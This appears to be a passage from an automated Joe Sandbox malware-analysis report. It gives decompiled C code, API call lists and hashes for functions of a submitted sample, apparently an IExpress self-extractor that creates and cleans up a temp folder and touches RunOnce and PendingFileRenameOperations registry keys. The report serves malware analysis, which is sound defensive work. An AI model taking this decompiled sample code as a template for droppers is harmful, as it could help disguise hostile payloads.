					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E008A6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x8a8a20 = 1;
				goto L5;
			}

0x008a53ac
0x008a53b3
0x008a53b9
0x008a53bb
0x008a53bd
0x008a53bf
0x008a53d1
0x008a53d6
0x008a53e0
0x008a53e2
0x008a53f5
0x008a53fb
0x008a5402
0x008a540b
0x00000000
0x00000000
0x008a5413
0x00000000
0x00000000
0x008a5415
0x008a5416
0x008a5427
0x008a542a
0x008a542b
0x008a5434
0x008a5434
0x008a543a
0x008a544c
0x008a544c
0x008a5452
0x008a545a
0x00000000
0x00000000
0x008a545e
0x008a545f
0x00000000

APIs

Part of subcall function 008A171E: _vsnprintf.MSVCRT ref: 008A1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A5452

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A53B7, 008A53E1, 008A541E
IXP, xrefs: 008A5419
IXP%03d.TMP, xrefs: 008A53C0

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2562829823
Opcode ID: ea53a3011cb6a92aa5f10ba461210fe513f8be5df5eda517b4daaaa610529fd9
Instruction ID: 40b1cab93fbccc23032e04272e32282b1f5d4054aafea951e46aa6c3f606f368
Opcode Fuzzy Hash: ea53a3011cb6a92aa5f10ba461210fe513f8be5df5eda517b4daaaa610529fd9
Instruction Fuzzy Hash: C3112271701A04A7F7249B269C08FAF366DFBC7321F000024B516C2E90DF788982C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 008A256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E008A256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E008A24E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x008a2572
0x008a2573
0x008a2575
0x008a2578
0x008a257d
0x008a2627
0x008a2583
0x008a2586
0x008a2589
0x008a25eb
0x008a2607
0x00000000
0x008a2609
0x008a261a
0x00000000
0x008a261a
0x00000000
0x008a258b
0x008a258b
0x008a259e
0x008a25b2
0x008a25ba
0x008a25cb
0x008a25d1
0x008a25d6
0x008a25da
0x008a25dd
0x008a25dd
0x008a25e3
0x008a25e3
0x008a25e3
0x008a258b
0x008a2589
0x008a262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,008A4096,008A4096,?,008A1ED3,00000001,00000000,?,?,008A4137,?), ref: 008A25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,008A4096,?,008A1ED3,00000001,00000000,?,?,008A4137,?,008A4096), ref: 008A25CB
RegCloseKey.KERNELBASE(?,?,008A1ED3,00000001,00000000,?,?,008A4137,?,008A4096), ref: 008A25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,008A4096,008A4096,?,008A1ED3,00000001,00000000,?,?,008A4137,?), ref: 008A25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,008A4096,00000000,00000000,00000000,00000000,?,008A1ED3,00000001,00000000), ref: 008A261A

Strings

PendingFileRenameOperations, xrefs: 008A25C3
System\CurrentControlSet\Control\Session Manager, xrefs: 008A25A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 008A25F5

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: ff5c3d905eab5766dfb9961ed02e8b156596d99f0f855c6153c6619128fe8ca9
Instruction ID: 95fa3872621c03bb0e0e5cbc5009986446dac4b5a212e21cebe8692521e8a50d
Opcode Fuzzy Hash: ff5c3d905eab5766dfb9961ed02e8b156596d99f0f855c6153c6619128fe8ca9
Instruction Fuzzy Hash: CA113D35D42228FBBB349B969C09DFBBE7CFB177A1F104055B808E2910E7345A44D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 008A6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E008A7155();
				_push(0x58);
				_push(0x8a72b8);
				E008A7208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x8a88b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x8a88b0; // 0x2
						if(__eflags != 0) {
							 *0x8a81e4 = _t58;
							goto L13;
						} else {
							 *0x8a88b0 = _t58;
							_t37 = E008A6C3F(0x8a10b8, 0x8a10c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L008A6FF4();
						L13:
						_t68 =  *0x8a88b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x8a10b4);
							_push(0x8a10ac);
							L008A7202();
							 *0x8a88b0 = 2;
						}
						if(_t53 == 0) {
							 *0x8a88ac = 0;
						}
						_t71 =  *0x8a88b4;
						if( *0x8a88b4 != 0 && E008A7060(_t71, 0x8a88b4) != 0) {
							_t60 =  *0x8a88b4; // 0x0
							 *0x8aa288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x777d5b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E008A2BFB(0x8a0000, 0, _t59); // executed
							 *0x8a81e0 = _t30;
							__eflags =  *0x8a81f8;
							if( *0x8a81f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x8a81e4;
							if( *0x8a81e4 == 0) {
								__imp___cexit();
								_t30 =  *0x8a81e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E008A724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x008a6a60
0x008a6a6a
0x008a6a6c
0x008a6a71
0x008a6a78
0x008a6a7f
0x008a6a85
0x008a6a8e
0x008a6a91
0x008a6a93
0x008a6a9c
0x008a6aa2
0x00000000
0x00000000
0x008a6aa6
0x008a6ab4
0x00000000
0x008a6aa8
0x008a6aaa
0x008a6aab
0x008a6aab
0x008a6abf
0x008a6abf
0x008a6ac5
0x008a6ad1
0x008a6ad7
0x008a6b05
0x00000000
0x008a6ad9
0x008a6ad9
0x008a6ae9
0x008a6af0
0x008a6af2
0x00000000
0x008a6af4
0x008a6af4
0x008a6afb
0x008a6afb
0x008a6af2
0x008a6ac7
0x008a6ac7
0x008a6ac9
0x008a6b0b
0x008a6b0b
0x008a6b11
0x008a6b13
0x008a6b18
0x008a6b1d
0x008a6b24
0x008a6b24
0x008a6b30
0x008a6b39
0x008a6b39
0x008a6b3b
0x008a6b42
0x008a6b57
0x008a6b5f
0x008a6b65
0x008a6b65
0x008a6b67
0x008a6b6c
0x008a6b6e
0x008a6b71
0x008a6b74
0x008a6b74
0x008a6b79
0x00000000
0x00000000
0x008a6b7d
0x008a6b81
0x00000000
0x00000000
0x008a6b83
0x008a6b8c
0x008a6b8d
0x008a6b90
0x008a6b90
0x008a6b83
0x008a6b81
0x008a6b94
0x008a6b98
0x008a6ba2
0x008a6b9a
0x008a6b9a
0x008a6b9a
0x008a6ba3
0x008a6bab
0x008a6bb0
0x008a6bb5
0x008a6bbc
0x008a6bbf
0x00000000
0x008a6bbf
0x008a6c1e
0x008a6c25
0x008a6c27
0x008a6c2d
0x008a6c2d
0x008a6c32
0x00000000
0x008a6bc5
0x008a6bc5
0x008a6bc8
0x008a6bcc
0x008a6bce
0x008a6bce
0x008a6bd1
0x008a6bd3
0x008a6bd3
0x008a6bd6
0x008a6bda
0x008a6be1
0x008a6be3
0x008a6be5
0x008a6be5
0x008a6be6
0x008a6be6
0x008a6be9
0x008a6bea
0x008a6bea
0x008a6b74
0x008a6c39
0x008a6c3e
0x008a6c3e
0x008a6abe
0x008a6abe
0x00000000

APIs

Part of subcall function 008A7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 008A7182
Part of subcall function 008A7155: GetCurrentProcessId.KERNEL32 ref: 008A7191
Part of subcall function 008A7155: GetCurrentThreadId.KERNEL32 ref: 008A719A
Part of subcall function 008A7155: GetTickCount.KERNEL32 ref: 008A71A3
Part of subcall function 008A7155: QueryPerformanceCounter.KERNEL32(?), ref: 008A71B8

GetStartupInfoW.KERNEL32(?,008A72B8,00000058), ref: 008A6A7F
Sleep.KERNEL32(000003E8), ref: 008A6AB4
_amsg_exit.MSVCRT ref: 008A6AC9
_initterm.MSVCRT ref: 008A6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 008A6B49
exit.KERNELBASE ref: 008A6BBF
_ismbblead.MSVCRT ref: 008A6BDA

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 2c3813f0ff27c3b08e67f1bf23bb55a55c4f831e384c06cf3727982ba56d2496
Instruction ID: de22f7912bd205561c83ce74614a323376852fa045391f935a0922b22621e400
Opcode Fuzzy Hash: 2c3813f0ff27c3b08e67f1bf23bb55a55c4f831e384c06cf3727982ba56d2496
Instruction Fuzzy Hash: 0E41D531904629DFFB219B68DC0876977A4FB47730F18402AE941E3E94EF784C52DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008A58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E008A58C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E008A1680(_t20, _t36, _t33);
					E008A658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x8a9124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E008A44B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x8a9124 = E008A6285();
					_t14 = 0;
				}
				return _t14;
			}

0x008a58cd
0x008a58d1
0x008a58d3
0x008a58d5
0x008a58d8
0x008a58d8
0x008a58da
0x008a58db
0x008a58e1
0x008a58ed
0x008a58f1
0x008a591e
0x008a592c
0x008a5943
0x008a594a
0x008a594d
0x008a5953
0x008a5959
0x00000000
0x008a595b
0x008a595c
0x008a5963
0x008a596c
0x00000000
0x008a5972
0x008a5974
0x008a597a
0x008a597a
0x008a596c
0x008a58f3
0x008a5901
0x008a5906
0x008a590b
0x008a5910
0x008a5910
0x008a5918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,008A5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,008A5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A5943
LocalFree.KERNEL32(00000000,?,008A5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A594D
CloseHandle.KERNEL32(00000000,?,008A5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,008A5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A5963

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A58CD, 008A58CF, 008A5919, 008A5962
TMP4351$.TMP, xrefs: 008A5923

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
API String ID: 747627703-1330067808
Opcode ID: 3a52fd32523aa36ac5ff13b704293023d4c5dd13b66c16dfa363b0e2e32d60b6
Instruction ID: 53de8fbe09c27e74b0c0cd0b2eb1facb88610728d4884ad82b3852c75544d88a
Opcode Fuzzy Hash: 3a52fd32523aa36ac5ff13b704293023d4c5dd13b66c16dfa363b0e2e32d60b6
Instruction Fuzzy Hash: 49110371600610A6F7241F79AC4DB9B7E99FB47360B140625F506D6E81DB788845C2A0

Uniqueness

Uniqueness Score: -1.00%

Function 008A51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E008A468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E008A468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E008A44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x8a9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x8a9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E008A44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x8a9124 = 0x80070714;
					goto L10;
				}
				E008A44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x8a9124 = E008A6285();
				goto L10;
			}

0x008a51fb
0x008a5207
0x008a520b
0x008a523c
0x008a5268
0x008a5270
0x008a528b
0x008a5293
0x008a529c
0x008a52a6
0x008a52b0
0x00000000
0x008a52b0
0x008a529e
0x008a5279
0x00000000
0x008a527b
0x008a5273
0x00000000
0x008a5273
0x008a524a
0x008a5250
0x008a5256
0x00000000
0x008a5256
0x008a5219
0x008a5223
0x00000000

APIs

Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46A0
Part of subcall function 008A468F: SizeofResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46A9
Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46C3
Part of subcall function 008A468F: LoadResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46CC
Part of subcall function 008A468F: LockResource.KERNEL32(00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46D3
Part of subcall function 008A468F: memcpy_s.MSVCRT ref: 008A46E5
Part of subcall function 008A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008A2F4D,?,00000002,00000000), ref: 008A5201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 008A5250

Part of subcall function 008A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008A4518
Part of subcall function 008A44B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 008A4554

Part of subcall function 008A6285: GetLastError.KERNEL32(008A5BBC), ref: 008A6285

Strings

UPROMPT, xrefs: 008A51EF, 008A5230
<None>, xrefs: 008A5262

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: 7d102d30d041a0ec10871cab385410720c6bfc01679a18df6937be8ef83874e9
Instruction ID: aaec11c46e6287d61c558a6967b067a7dfa9fc3991a90a05ba4ca27f184f07e0
Opcode Fuzzy Hash: 7d102d30d041a0ec10871cab385410720c6bfc01679a18df6937be8ef83874e9
Instruction Fuzzy Hash: 8611E2B5301605ABFB146BB99C49B3B719EFBCB784F104029F742D6E90EABD8C018125

Uniqueness

Uniqueness Score: -1.00%

Function 008A52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E008A52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x8a91e0; // 0x2ff8088
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x8a8a24 == 0 &&  *0x8a9a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x8a8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x8a8a24 == 0 &&  *0x8a9a30 == 0) {
					_push(_t22);
					E008A1781( &_v268, 0x104, _t22, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
					if(( *0x8a9a34 & 0x00000020) != 0) {
						E008A65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E008A2390( &_v268);
					_t11 =  *0x8a8a20; // 0x0
				}
				if( *0x8a9a40 != 1 && _t11 != 0) {
					_t11 = E008A1FE1(_t22); // executed
				}
				 *0x8a8a20 =  *0x8a8a20 & 0x00000000;
				return E008A6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x008a52b6
0x008a52b6
0x008a52b6
0x008a52c1
0x008a52c8
0x008a52cb
0x008a52cc
0x008a52d4
0x008a52d6
0x008a52d7
0x008a52de
0x008a52e0
0x008a52f2
0x008a52fa
0x008a52fa
0x008a5302
0x008a5305
0x008a530c
0x008a5312
0x008a5316
0x008a5316
0x008a5317
0x008a531c
0x008a531f
0x008a5333
0x008a5345
0x008a5351
0x008a5359
0x008a5359
0x008a5363
0x008a5369
0x008a536f
0x008a5374
0x008a5374
0x008a5381
0x008a5387
0x008a5387
0x008a538f
0x008a53a0

APIs

SetFileAttributesA.KERNELBASE(02FF8088,00000080,?,00000000), ref: 008A52F2
DeleteFileA.KERNELBASE(02FF8088), ref: 008A52FA
LocalFree.KERNEL32(02FF8088,?,00000000), ref: 008A5305
LocalFree.KERNEL32(02FF8088), ref: 008A530C
SetCurrentDirectoryA.KERNELBASE(008A11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008A5363

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A5334

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 2833751637-388467436
Opcode ID: 2ef953a32bfea1f485973a19dda46b747d9f99adf0f98bb2aaf86111326a0468
Instruction ID: 9953fed6706641d549a4a9cabc572b89f1a9248342405c8eedcdf6a94e677ab6
Opcode Fuzzy Hash: 2ef953a32bfea1f485973a19dda46b747d9f99adf0f98bb2aaf86111326a0468
Instruction Fuzzy Hash: 58219F31A14A24DFFF259B14DC09B6977A0FB43754F04015AE486D2EA0EFB46CC4CB52

Uniqueness

Uniqueness Score: -1.00%

Function 008A1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x8a8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x008a1fee
0x008a2005
0x008a200d
0x008a2017
0x00000000
0x008a2020
0x008a200d
0x008a2029

APIs

